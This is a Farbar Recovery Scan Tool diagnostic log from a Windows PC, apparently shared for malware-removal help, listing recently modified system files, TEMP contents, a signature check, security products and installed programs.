2014-09-15 11:29 - 2014-05-14 20:47 - 00668160 _____ (Microsoft Corporation) C:\windows\SysWOW64\KernelBase.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 00666624 _____ (Microsoft Corporation) C:\windows\SysWOW64\kerberos.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 00578048 _____ (Microsoft Corporation) C:\windows\system32\winlogon.exe
2014-09-15 11:29 - 2014-05-14 20:47 - 00570216 _____ (Microsoft Corporation) C:\windows\system32\Drivers\cng.sys
2014-09-15 11:29 - 2014-05-14 20:47 - 00323072 _____ (Microsoft Corporation) C:\windows\SysWOW64\schannel.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 00273920 _____ (Microsoft Corporation) C:\windows\SysWOW64\msv1_0.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 00179712 _____ (Microsoft Corporation) C:\windows\system32\dpapisrv.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 00172888 _____ (Microsoft Corporation) C:\windows\system32\Drivers\ksecpkg.sys
2014-09-15 11:29 - 2014-05-14 20:47 - 00094720 _____ (Microsoft Corporation) C:\windows\system32\TSpkg.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 00045056 _____ (Microsoft Corporation) C:\windows\system32\dimsroam.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 00020480 _____ (Microsoft Corporation) C:\windows\system32\credssp.dll
2014-09-15 11:29 - 2014-05-14 20:47 - 00014848 _____ (Microsoft Corporation) C:\windows\system32\workerdd.dll
2014-09-15 11:28 - 2014-05-14 20:47 - 00961536 _____ (Microsoft Corporation) C:\windows\SysWOW64\usercpl.dll
2014-09-15 11:28 - 2014-05-14 20:47 - 00559104 _____ (Microsoft Corporation) C:\windows\SysWOW64\objsel.dll
2014-09-15 11:28 - 2014-05-14 20:47 - 00419328 _____ (Microsoft Corporation) C:\windows\system32\schannel.dll
2014-09-15 11:28 - 2014-05-14 20:47 - 00318464 _____ (Microsoft Corporation) C:\windows\system32\msv1_0.dll
2014-09-15 11:28 - 2014-05-14 20:47 - 00208896 _____ (Microsoft Corporation) C:\windows\system32\wdigest.dll
2014-09-15 11:28 - 2014-05-14 20:47 - 00178688 _____ (Microsoft Corporation) C:\windows\SysWOW64\wdigest.dll
2014-09-15 11:28 - 2014-05-14 20:47 - 00164864 _____ (Microsoft Corporation) C:\windows\system32\sspicli.dll
2014-09-15 11:28 - 2014-05-14 20:47 - 00100184 _____ (Microsoft Corporation) C:\windows\system32\Drivers\ksecdd.sys
2014-09-15 11:28 - 2014-05-14 20:47 - 00099840 _____ (Microsoft Corporation) C:\windows\SysWOW64\sspicli.dll
2014-09-15 11:28 - 2014-05-14 20:47 - 00076800 _____ (Microsoft Corporation) C:\windows\SysWOW64\TSpkg.dll
2014-09-15 11:28 - 2014-05-14 20:47 - 00038400 _____ (Microsoft Corporation) C:\windows\SysWOW64\dimsroam.dll
2014-09-15 11:28 - 2014-05-14 20:47 - 00035840 _____ (Microsoft Corporation) C:\windows\system32\lsass.exe
2014-09-15 11:28 - 2014-05-14 20:47 - 00027648 _____ (Microsoft Corporation) C:\windows\system32\sspisrv.dll
2014-09-15 11:28 - 2014-05-14 20:47 - 00017408 _____ (Microsoft Corporation) C:\windows\SysWOW64\credssp.dll
2014-09-15 11:24 - 2014-06-29 13:09 - 00915968 _____ (Microsoft Corporation) C:\windows\system32\MPSSVC.dll
2014-09-15 11:24 - 2014-06-29 13:09 - 00758784 _____ (Microsoft Corporation) C:\windows\system32\FirewallAPI.dll
2014-09-15 11:24 - 2014-06-29 13:09 - 00550400 _____ (Microsoft Corporation) C:\windows\SysWOW64\FirewallAPI.dll
2014-09-15 11:24 - 2014-06-29 13:09 - 00227840 _____ (Microsoft Corporation) C:\windows\system32\WebClnt.dll
2014-09-15 11:24 - 2014-06-29 13:09 - 00199168 _____ (Microsoft Corporation) C:\windows\SysWOW64\WebClnt.dll
2014-09-15 11:24 - 2014-06-29 13:09 - 00104448 _____ (Microsoft Corporation) C:\windows\system32\davclnt.dll
2014-09-15 11:24 - 2014-06-29 13:09 - 00086016 _____ (Microsoft Corporation) C:\windows\SysWOW64\davclnt.dll
2014-09-15 11:24 - 2014-06-29 13:09 - 00074752 _____ (Microsoft Corporation) C:\windows\system32\Drivers\mpsdrv.sys
2014-09-15 11:19 - 2014-06-29 13:09 - 00020992 _____ (Microsoft Corporation) C:\windows\system32\Drivers\usb8023.sys
2014-09-15 11:12 - 2014-06-29 13:10 - 00888320 _____ (Microsoft Corporation) C:\windows\system32\autochk.exe
2014-09-15 11:12 - 2014-06-29 13:10 - 00793088 _____ (Microsoft Corporation) C:\windows\SysWOW64\autochk.exe
2014-09-15 11:12 - 2014-06-29 13:10 - 00542208 _____ (Microsoft Corporation) C:\windows\system32\untfs.dll
2014-09-15 11:12 - 2014-06-29 13:10 - 00482816 _____ (Microsoft Corporation) C:\windows\SysWOW64\untfs.dll
2014-09-15 11:10 - 2014-06-29 13:10 - 01483776 _____ (Microsoft Corporation) C:\windows\system32\VSSVC.exe
2014-09-15 11:10 - 2014-06-29 13:10 - 01131520 _____ (Microsoft Corporation) C:\windows\system32\AppXDeploymentServer.dll
2014-09-15 11:10 - 2014-06-29 13:10 - 00708096 _____ (Microsoft Corporation) C:\windows\system32\AppXDeploymentExtensions.dll
2014-09-15 11:10 - 2014-06-29 13:10 - 00470528 _____ (Microsoft Corporation) C:\windows\system32\netprofmsvc.dll
2014-09-15 11:10 - 2014-06-29 13:10 - 00389120 _____ (Microsoft Corporation) C:\windows\system32\BCP47Langs.dll
2014-09-15 11:10 - 2014-06-29 13:10 - 00169984 _____ (Microsoft Corporation) C:\windows\system32\netplwiz.dll
2014-09-15 11:10 - 2014-06-29 13:10 - 00151552 _____ (Microsoft Corporation) C:\windows\system32\netprofm.dll
2014-09-15 11:10 - 2014-06-29 13:10 - 00012288 _____ (Microsoft Corporation) C:\windows\SysWOW64\nlmsprep.dll
2014-09-15 11:09 - 2014-06-29 13:10 - 00419840 _____ (Microsoft Corporation) C:\windows\system32\intl.cpl
2014-09-15 11:09 - 2014-06-29 13:10 - 00115712 _____ (Microsoft Corporation) C:\windows\SysWOW64\netprofm.dll
2014-09-15 11:09 - 2014-06-29 13:10 - 00018432 _____ (Microsoft Corporation) C:\windows\SysWOW64\npmproxy.dll
2014-09-15 11:09 - 2014-06-29 13:10 - 00015872 _____ (Microsoft Corporation) C:\windows\SysWOW64\nlmproxy.dll
2014-09-15 11:08 - 2014-06-29 13:10 - 00449536 _____ (Microsoft Corporation) C:\windows\SysWOW64\DevicePairing.dll
2014-09-15 11:08 - 2014-06-29 13:10 - 00427520 _____ (Microsoft Corporation) C:\windows\system32\Drivers\rdbss.sys
2014-09-15 11:08 - 2014-06-29 13:10 - 00389632 _____ (Microsoft Corporation) C:\windows\SysWOW64\intl.cpl
2014-09-15 11:08 - 2014-06-29 13:10 - 00309760 _____ (Microsoft Corporation) C:\windows\SysWOW64\BCP47Langs.dll
2014-09-15 11:08 - 2014-06-29 13:10 - 00120736 _____ (Microsoft Corporation) C:\windows\system32\AuthHost.exe
2014-09-15 11:08 - 2014-06-29 13:10 - 00093696 _____ (Microsoft Corporation) C:\windows\system32\psmsrv.dll
2014-09-15 11:08 - 2014-06-29 13:10 - 00092160 _____ (Microsoft Corporation) C:\windows\SysWOW64\biwinrt.dll
2014-09-15 11:07 - 2014-06-29 13:10 - 01332736 _____ (Microsoft Corporation) C:\windows\system32\sysmain.dll
2014-09-15 11:07 - 2014-06-29 13:10 - 00812544 _____ (Microsoft Corporation) C:\windows\system32\Magnify.exe
2014-09-15 11:07 - 2014-06-29 13:10 - 00758784 _____ (Microsoft Corporation) C:\windows\SysWOW64\Magnify.exe
2014-09-15 11:07 - 2014-06-29 13:10 - 00560640 _____ (Microsoft Corporation) C:\windows\system32\mfmp4srcsnk.dll
2014-09-15 11:07 - 2014-06-29 13:10 - 00501760 _____ (Microsoft Corporation) C:\windows\system32\DevicePairing.dll
2014-09-15 11:07 - 2014-06-29 13:10 - 00411136 _____ (Microsoft Corporation) C:\windows\SysWOW64\mfmp4srcsnk.dll
2014-09-15 11:07 - 2014-06-29 13:10 - 00330240 _____ (Microsoft Corporation) C:\windows\system32\stobject.dll
2014-09-15 11:07 - 2014-06-29 13:10 - 00303616 _____ (Microsoft Corporation) C:\windows\SysWOW64\stobject.dll
2014-09-15 11:07 - 2014-06-29 13:10 - 00179712 _____ (Microsoft Corporation) C:\windows\system32\bisrv.dll
2014-09-15 11:07 - 2014-06-29 13:10 - 00151040 _____ (Microsoft Corporation) C:\windows\SysWOW64\netplwiz.dll
2014-09-15 11:07 - 2014-06-29 13:10 - 00122368 _____ (Microsoft Corporation) C:\windows\system32\biwinrt.dll
2014-09-15 11:07 - 2014-06-29 13:10 - 00077824 _____ (Microsoft Corporation) C:\windows\system32\taskhost.exe
2014-09-15 11:07 - 2014-06-29 13:10 - 00072192 _____ (Microsoft Corporation) C:\windows\system32\taskhostex.exe
2014-09-15 11:07 - 2014-06-29 13:10 - 00017408 _____ (Microsoft Corporation) C:\windows\system32\muifontsetup.dll
2014-09-15 11:07 - 2014-06-29 13:10 - 00014336 _____ (Microsoft Corporation) C:\windows\SysWOW64\muifontsetup.dll
2014-09-15 11:01 - 2014-06-29 13:07 - 00733184 _____ (Microsoft Corporation) C:\windows\system32\win32spl.dll
2014-09-15 11:00 - 2014-06-29 13:06 - 02842112 _____ (Microsoft Corporation) C:\windows\system32\WMVDECOD.DLL
2014-09-15 11:00 - 2014-06-29 13:06 - 02620928 _____ (Microsoft Corporation) C:\windows\SysWOW64\WMVDECOD.DLL
2014-09-15 10:59 - 2014-06-29 13:06 - 00124112 _____ (Microsoft Corporation) C:\windows\system32\PresentationCFFRasterizerNative_v0300.dll
2014-09-15 10:59 - 2014-06-29 13:06 - 00102608 _____ (Microsoft Corporation) C:\windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2014-09-15 10:58 - 2014-06-29 13:05 - 00222720 _____ (Microsoft Corporation) C:\windows\system32\scrobj.dll
2014-09-15 10:58 - 2014-06-29 13:05 - 00194048 _____ (Microsoft Corporation) C:\windows\system32\scrrun.dll
2014-09-15 10:58 - 2014-06-29 13:05 - 00162304 _____ (Microsoft Corporation) C:\windows\SysWOW64\scrobj.dll
2014-09-15 10:58 - 2014-06-29 13:05 - 00156160 _____ (Microsoft Corporation) C:\windows\SysWOW64\scrrun.dll
2014-09-15 10:58 - 2014-06-29 13:05 - 00146944 _____ (Microsoft Corporation) C:\windows\system32\cscript.exe
2014-09-15 10:58 - 2014-06-29 13:05 - 00143872 _____ (Microsoft Corporation) C:\windows\system32\wshom.ocx
2014-09-15 10:58 - 2014-06-29 13:05 - 00115712 _____ (Microsoft Corporation) C:\windows\SysWOW64\cscript.exe
2014-09-15 10:53 - 2014-06-29 13:05 - 00337408 _____ (Microsoft Corporation) C:\windows\system32\wintrust.dll
2014-09-15 10:53 - 2014-06-29 13:05 - 00261120 _____ (Microsoft Corporation) C:\windows\SysWOW64\wintrust.dll
2014-09-15 10:53 - 2014-06-29 13:05 - 00124416 _____ (Microsoft Corporation) C:\windows\system32\apprepapi.dll
2014-09-15 10:53 - 2014-06-29 13:05 - 00098304 _____ (Microsoft Corporation) C:\windows\system32\apprepsync.dll
2014-09-15 10:53 - 2014-06-29 13:05 - 00087040 _____ (Microsoft Corporation) C:\windows\SysWOW64\apprepapi.dll
2014-09-15 10:53 - 2014-06-29 13:05 - 00074240 _____ (Microsoft Corporation) C:\windows\SysWOW64\apprepsync.dll
2014-09-15 10:53 - 2014-06-29 13:05 - 00068096 _____ (Microsoft Corporation) C:\windows\system32\cryptsvc.dll
2014-09-15 10:51 - 2014-06-29 13:05 - 03842560 _____ (Microsoft Corporation) C:\windows\system32\d2d1.dll
2014-09-15 10:51 - 2014-06-29 13:05 - 03288576 _____ (Microsoft Corporation) C:\windows\SysWOW64\d2d1.dll
2014-09-15 10:51 - 2014-06-29 13:05 - 02238976 _____ (Microsoft Corporation) C:\windows\system32\d3d10warp.dll
2014-09-15 10:51 - 2014-06-29 13:05 - 02032640 _____ (Microsoft Corporation) C:\windows\SysWOW64\d3d10warp.dll
2014-09-15 10:48 - 2014-06-29 13:05 - 00861184 _____ (Microsoft Corporation) C:\windows\system32\Drivers\http.sys
2014-09-15 10:45 - 2014-07-09 22:42 - 00576512 _____ (Microsoft Corporation) C:\windows\system32\Drivers\afd.sys
2014-09-15 10:34 - 2014-07-09 22:42 - 00596480 _____ (Microsoft Corporation) C:\windows\system32\qedit.dll
2014-09-15 10:34 - 2014-07-09 22:42 - 00497152 _____ (Microsoft Corporation) C:\windows\SysWOW64\qedit.dll
2014-09-15 10:28 - 2014-06-29 13:00 - 02233176 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tcpip.sys
2014-09-15 10:17 - 2014-06-29 13:02 - 00805376 _____ (Microsoft Corporation) C:\windows\system32\Drivers\PEAuth.sys
2014-09-15 10:17 - 2014-06-29 13:01 - 00489576 _____ (Microsoft Corporation) C:\windows\system32\AudioEng.dll
2014-09-15 10:17 - 2014-06-29 13:01 - 00468992 _____ (Microsoft Corporation) C:\windows\system32\MFMediaEngine.dll
2014-09-15 10:17 - 2014-06-29 13:01 - 00456704 _____ (Microsoft Corporation) C:\windows\system32\wpncore.dll
2014-09-15 10:17 - 2014-06-29 13:01 - 00446792 _____ (Microsoft Corporation) C:\windows\system32\AudioSes.dll
2014-09-15 10:17 - 2014-06-29 13:01 - 00253544 _____ (Microsoft Corporation) C:\windows\system32\audiodg.exe
2014-09-15 10:17 - 2014-06-29 13:01 - 00210432 _____ (Microsoft Corporation) C:\windows\system32\iuilp.dll
2014-09-15 10:17 - 2014-06-29 13:01 - 00172544 _____ (Microsoft Corporation) C:\windows\system32\dwmredir.dll
2014-09-15 10:17 - 2014-06-29 13:01 - 00169472 _____ (Microsoft Corporation) C:\windows\system32\AudioEndpointBuilder.dll
2014-09-15 10:17 - 2014-06-29 13:01 - 00155648 _____ (Microsoft Corporation) C:\windows\SysWOW64\dmvdsitf.dll
2014-09-15 10:16 - 2014-06-29 13:02 - 01113600 _____ (Microsoft Corporation) C:\windows\SysWOW64\MSAudDecMFT.dll
2014-09-15 10:16 - 2014-06-29 13:02 - 00298456 _____ (Microsoft Corporation) C:\windows\system32\rsaenh.dll
2014-09-15 10:16 - 2014-06-29 13:01 - 00426024 _____ (Microsoft Corporation) C:\windows\SysWOW64\AudioEng.dll
2014-09-15 10:16 - 2014-06-29 13:01 - 00411136 _____ (Microsoft Corporation) C:\windows\SysWOW64\Windows.Networking.dll
2014-09-15 10:16 - 2014-06-29 13:01 - 00367616 _____ (Microsoft Corporation) C:\windows\system32\conhost.exe
2014-09-15 10:16 - 2014-06-29 13:01 - 00324368 _____ (Microsoft Corporation) C:\windows\SysWOW64\AudioSes.dll
2014-09-15 10:16 - 2014-06-29 13:01 - 00281088 _____ (Microsoft Corporation) C:\windows\system32\mfreadwrite.dll
2014-09-15 10:16 - 2014-06-29 13:01 - 00252928 _____ (Microsoft Corporation) C:\windows\SysWOW64\rsaenh.dll
2014-09-15 10:16 - 2014-06-29 13:01 - 00214528 _____ (Microsoft Corporation) C:\windows\SysWOW64\mfreadwrite.dll
2014-09-15 10:16 - 2014-06-29 13:01 - 00196096 _____ (Microsoft Corporation) C:\windows\system32\dmvdsitf.dll
2014-09-15 10:16 - 2014-06-29 13:01 - 00099840 _____ (Microsoft Corporation) C:\windows\system32\wscsvc.dll
2014-09-15 10:16 - 2014-06-29 13:01 - 00041984 _____ (Microsoft Corporation) C:\windows\SysWOW64\fmifs.dll
2014-09-15 10:15 - 2014-06-29 13:02 - 14267904 _____ (Microsoft Corporation) C:\windows\system32\wmp.dll
2014-09-15 10:15 - 2014-06-29 13:02 - 03552768 _____ (Microsoft Corporation) C:\windows\system32\tquery.dll
2014-09-15 10:15 - 2014-06-29 13:02 - 02107904 _____ (Microsoft Corporation) C:\windows\system32\mssrch.dll
2014-09-15 10:15 - 2014-06-29 13:02 - 00816128 _____ (Microsoft Corporation) C:\windows\system32\SearchIndexer.exe
2014-09-15 10:15 - 2014-06-29 13:01 - 00745984 _____ (Microsoft Corporation) C:\windows\system32\mssvp.dll
2014-09-15 10:15 - 2014-06-29 13:01 - 00503080 _____ (Microsoft Corporation) C:\windows\system32\ci.dll
2014-09-15 10:15 - 2014-06-29 13:01 - 00435200 _____ (Microsoft Corporation) C:\windows\system32\mssph.dll
2014-09-15 10:15 - 2014-06-29 13:01 - 00414720 _____ (Microsoft Corporation) C:\windows\system32\GenuineCenter.dll
2014-09-15 10:15 - 2014-06-29 13:01 - 00373760 _____ (Microsoft Corporation) C:\windows\system32\SearchProtocolHost.exe
2014-09-15 10:15 - 2014-06-29 13:01 - 00197120 _____ (Microsoft Corporation) C:\windows\system32\SearchFilterHost.exe
2014-09-15 10:15 - 2014-06-29 13:01 - 00155136 _____ (Microsoft Corporation) C:\windows\SysWOW64\XpsRasterService.dll
2014-09-15 10:15 - 2014-06-29 13:01 - 00096256 _____ (Microsoft Corporation) C:\windows\system32\mssprxy.dll
2014-09-15 10:15 - 2014-06-29 13:01 - 00083456 _____ (Microsoft Corporation) C:\windows\system32\Drivers\wanarp.sys
2014-09-15 10:15 - 2014-06-29 13:01 - 00065024 _____ (Microsoft Corporation) C:\windows\system32\msscntrs.dll
2014-09-15 10:15 - 2014-06-29 13:01 - 00060416 _____ (Microsoft Corporation) C:\windows\system32\Drivers\ndproxy.sys
2014-09-15 10:15 - 2014-06-29 13:01 - 00013824 _____ (Microsoft Corporation) C:\windows\system32\msshooks.dll
2014-09-15 10:14 - 2014-06-29 13:02 - 11878912 _____ (Microsoft Corporation) C:\windows\SysWOW64\wmp.dll
2014-09-15 10:14 - 2014-06-29 13:02 - 02767360 _____ (Microsoft Corporation) C:\windows\SysWOW64\tquery.dll
2014-09-15 10:14 - 2014-06-29 13:02 - 01593344 _____ (Microsoft Corporation) C:\windows\SysWOW64\mssrch.dll
2014-09-15 10:14 - 2014-06-29 13:02 - 00403968 _____ (Microsoft Corporation) C:\windows\SysWOW64\mssph.dll
2014-09-15 10:14 - 2014-06-29 13:01 - 00804352 _____ (Microsoft Corporation) C:\windows\system32\RecoveryDrive.exe
2014-09-15 10:14 - 2014-06-29 13:01 - 00670208 _____ (Microsoft Corporation) C:\windows\SysWOW64\SearchIndexer.exe
2014-09-15 10:14 - 2014-06-29 13:01 - 00659456 _____ (Microsoft Corporation) C:\windows\SysWOW64\mssvp.dll
2014-09-15 10:14 - 2014-06-29 13:01 - 00303848 _____ (Microsoft Corporation) C:\windows\system32\Drivers\dxgmms1.sys
2014-09-15 10:14 - 2014-06-29 13:01 - 00302592 _____ (Microsoft Corporation) C:\windows\SysWOW64\SearchProtocolHost.exe
2014-09-15 10:14 - 2014-06-29 13:01 - 00231936 _____ (Microsoft Corporation) C:\windows\system32\fhengine.dll
2014-09-15 10:14 - 2014-06-29 13:01 - 00228352 _____ (Microsoft Corporation) C:\windows\system32\XpsRasterService.dll
2014-09-15 10:14 - 2014-06-29 13:01 - 00186880 _____ (Microsoft Corporation) C:\windows\SysWOW64\mssphtb.dll
2014-09-15 10:14 - 2014-06-29 13:01 - 00171008 _____ (Microsoft Corporation) C:\windows\SysWOW64\SearchFilterHost.exe
2014-09-15 10:14 - 2014-06-29 13:01 - 00123880 _____ (Microsoft Corporation) C:\windows\SysWOW64\wscapi.dll
2014-09-15 10:14 - 2014-06-29 13:01 - 00050176 _____ (Microsoft Corporation) C:\windows\system32\fmifs.dll
2014-09-15 10:14 - 2014-06-29 13:01 - 00035328 _____ (Microsoft Corporation) C:\windows\SysWOW64\mssprxy.dll
2014-09-15 10:14 - 2014-06-29 13:01 - 00010752 _____ (Microsoft Corporation) C:\windows\SysWOW64\msshooks.dll
2014-09-15 10:13 - 2014-06-29 13:02 - 01444864 _____ (Microsoft Corporation) C:\windows\system32\MSAudDecMFT.dll
2014-09-15 10:13 - 2014-06-29 13:02 - 00306952 _____ (Microsoft Corporation) C:\windows\system32\kd_02_10ec.dll
2014-09-15 10:13 - 2014-06-29 13:01 - 00595456 _____ (Microsoft Corporation) C:\windows\system32\Windows.Networking.dll
2014-09-15 10:13 - 2014-06-29 13:01 - 00361984 _____ (Microsoft Corporation) C:\windows\SysWOW64\MFMediaEngine.dll
2014-09-15 10:13 - 2014-06-29 13:01 - 00086280 _____ (Microsoft Corporation) C:\windows\system32\kdnet.dll
2014-09-15 10:13 - 2014-06-29 13:01 - 00077960 _____ (Microsoft Corporation) C:\windows\system32\kdvm.dll
2014-09-15 10:05 - 2014-06-29 13:00 - 01374208 _____ (Microsoft Corporation) C:\windows\system32\wdc.dll
2014-09-15 10:05 - 2014-06-29 13:00 - 01245696 _____ (Microsoft Corporation) C:\windows\SysWOW64\wdc.dll
2014-09-15 10:05 - 2014-06-29 13:00 - 00566784 _____ (Microsoft Corporation) C:\windows\system32\wvc.dll
2014-09-15 10:05 - 2014-06-29 13:00 - 00462336 _____ (Microsoft Corporation) C:\windows\system32\sysmon.ocx
2014-09-15 10:05 - 2014-06-29 13:00 - 00437248 _____ (Microsoft Corporation) C:\windows\SysWOW64\wvc.dll
2014-09-15 10:05 - 2014-06-29 13:00 - 00399360 _____ (Microsoft Corporation) C:\windows\SysWOW64\sysmon.ocx
2014-09-15 10:04 - 2014-06-29 13:00 - 00199168 _____ (Microsoft Corporation) C:\windows\SysWOW64\shdocvw.dll
2014-09-15 10:03 - 2014-06-29 13:00 - 01125888 _____ (Microsoft Corporation) C:\windows\system32\msctf.dll
2014-09-15 10:03 - 2014-06-29 13:00 - 00893952 _____ (Microsoft Corporation) C:\windows\SysWOW64\msctf.dll
2014-09-15 10:03 - 2014-06-29 13:00 - 00448512 _____ (Microsoft Corporation) C:\windows\system32\SettingSync.dll
2014-09-15 10:03 - 2014-06-29 13:00 - 00356352 _____ (Microsoft Corporation) C:\windows\SysWOW64\SettingSync.dll
2014-09-15 10:03 - 2014-06-29 13:00 - 00225280 _____ (Microsoft Corporation) C:\windows\system32\mbsmsapi.dll
2014-09-15 10:03 - 2014-06-29 13:00 - 00222208 _____ (Microsoft Corporation) C:\windows\system32\shdocvw.dll
2014-09-15 10:03 - 2014-06-29 13:00 - 00128512 _____ (Microsoft Corporation) C:\windows\system32\SettingSyncInfo.dll
2014-09-15 10:03 - 2014-06-29 13:00 - 00100864 _____ (Microsoft Corporation) C:\windows\SysWOW64\SettingSyncInfo.dll
2014-09-15 10:03 - 2014-06-29 13:00 - 00069864 _____ (Microsoft Corporation) C:\windows\system32\Drivers\pdc.sys
2014-09-15 10:02 - 2014-06-29 13:00 - 00411880 _____ (Microsoft Corporation) C:\windows\system32\Drivers\FWPKCLNT.SYS
2014-09-15 10:02 - 2014-06-29 13:00 - 00158208 _____ (Microsoft Corporation) C:\windows\SysWOW64\mbsmsapi.dll
2014-09-15 10:01 - 2014-08-08 20:59 - 00000000 ____D () C:\windows\system32\MRT
2014-09-15 09:38 - 2014-06-29 13:00 - 01845760 _____ (Microsoft Corporation) C:\windows\system32\msxml3.dll
2014-09-15 09:38 - 2014-06-29 13:00 - 01419264 _____ (Microsoft Corporation) C:\windows\SysWOW64\msxml3.dll
2014-09-15 09:25 - 2014-05-14 20:38 - 01258496 _____ (Microsoft Corporation) C:\windows\system32\kernel32.dll
2014-09-15 09:25 - 2014-05-14 20:38 - 01120768 _____ (Microsoft Corporation) C:\windows\system32\gpedit.dll
2014-09-15 09:25 - 2014-05-14 20:38 - 01075200 _____ (Microsoft Corporation) C:\windows\SysWOW64\gpedit.dll
2014-09-15 09:25 - 2014-05-14 20:38 - 00974848 _____ (Microsoft Corporation) C:\windows\SysWOW64\kernel32.dll
2014-09-15 09:25 - 2014-05-14 20:38 - 00370688 _____ (Microsoft Corporation) C:\windows\system32\Drivers\mrxsmb.sys
2014-09-15 09:25 - 2014-05-14 20:38 - 00247808 _____ (Microsoft Corporation) C:\windows\system32\Drivers\srvnet.sys
2014-09-15 09:25 - 2014-05-14 20:38 - 00215040 _____ (Microsoft Corporation) C:\windows\system32\Drivers\mrxsmb20.sys
2014-09-14 20:22 - 2012-07-25 22:38 - 00000000 ____D () C:\windows\system32\Sysprep
2014-09-14 15:30 - 2014-06-04 09:02 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Local\WinZip
2014-09-14 15:30 - 2014-05-19 13:36 - 00000000 __RHD () C:\Users\Jeremy and Heidi\AppData\Roaming\SecuROM
2014-09-14 15:30 - 2012-12-21 22:22 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Roaming\Thunderbird
2014-09-14 15:30 - 2012-12-18 23:28 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Roaming\Adobe
2014-09-14 08:30 - 2014-07-28 08:06 - 00000000 ____D () C:\ProgramData\AVG2014

Some content of TEMP:
====================
C:\Users\Jeremy and Heidi\AppData\Local\Temp\bdfilters.dll
C:\Users\Jeremy and Heidi\AppData\Local\Temp\drm_dyndata_7370014.dll
C:\Users\Jeremy and Heidi\AppData\Local\Temp\ochelper.dll
C:\Users\Jeremy and Heidi\AppData\Local\Temp\ochelper.exe
C:\Users\Jeremy and Heidi\AppData\Local\Temp\pidvazc.dll
C:\Users\Jeremy and Heidi\AppData\Local\Temp\SymCCIS.dll
C:\Users\Jeremy and Heidi\AppData\Local\Temp\ufsuqej.dll


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-10-14 03:04

==================== End Of Log ============================

Here is the "Addition" file:

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14-10-2014
Ran by Jeremy and Heidi at 2014-10-14 19:31:56
Running from C:\Users\Jeremy and Heidi\Downloads
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: AVG AntiVirus Free Edition 2014 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AV: Emsisoft Anti-Malware (Enabled - Up to date) {8504DEEF-CC04-1F76-2137-F1A5F4A659DA}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Emsisoft Anti-Malware (Enabled - Up to date) {3E653F0B-EA3E-10F8-1B87-CAD78F211367}
AS: AVG AntiVirus Free Edition 2014 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
7-zip v9.20 (HKLM-x32\...\7-zip) (Version: v9.20 - TUGUU SL) <==== ATTENTION
Adobe Reader X (10.1.3) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.3 - Adobe Systems Incorporated)
AMD Accelerated Video Transcoding (Version: 12.5.100.20808 - Advanced Micro Devices, Inc.) Hidden
AMD APP SDK Runtime (Version: 10.0.938.2 - Advanced Micro Devices Inc.) Hidden
AMD Catalyst Install Manager (HKLM\...\{79AE0BD1-A930-B07C-C96D-E11FA9BB586F}) (Version: 8.0.881.0 - Advanced Micro Devices, Inc.)
AMD Quick Stream (HKLM\...\{E9EED4AE-682B-4501-9574-D09A21717599}_is1) (Version: 3.3.26.0 - AppEx Networks)
AMD VISION Engine Control Center (x32 Version: 2012.0808.1024.16666 - Advanced Micro Devices, Inc.) Hidden
Apple Application Support (HKLM-x32\...\{D9DAD0FF-495A-472B-9F10-BAE430A26682}) (Version: 3.0.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{787136D2-F0F8-4625-AA3F-72D7795AC842}) (Version: 7.1.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
AVG 2014 (HKLM\...\AVG) (Version: 2014.0.4765 - AVG Technologies)
AVG 2014 (Version: 14.0.4040 - AVG Technologies) Hidden
AVG 2014 (Version: 14.0.4765 - AVG Technologies) Hidden
AVS Video Converter 8 (HKLM-x32\...\AVS4YOU Video Converter 7_is1) (Version: 8.3.2.533 - Online Media Technologies Ltd.)
Bandicam (HKLM-x32\...\Bandicam) (Version: 2.0.2.655 - Bandisoft.com)
Bandicut (HKLM-x32\...\Bandicut) (Version: 1.2.4.93 - Bandisoft.com)
Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version:  - Bandisoft.com)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Catalyst Control Center - Branding (x32 Version: 1.00.0000 - Advanced Micro Devices, Inc.) Hidden
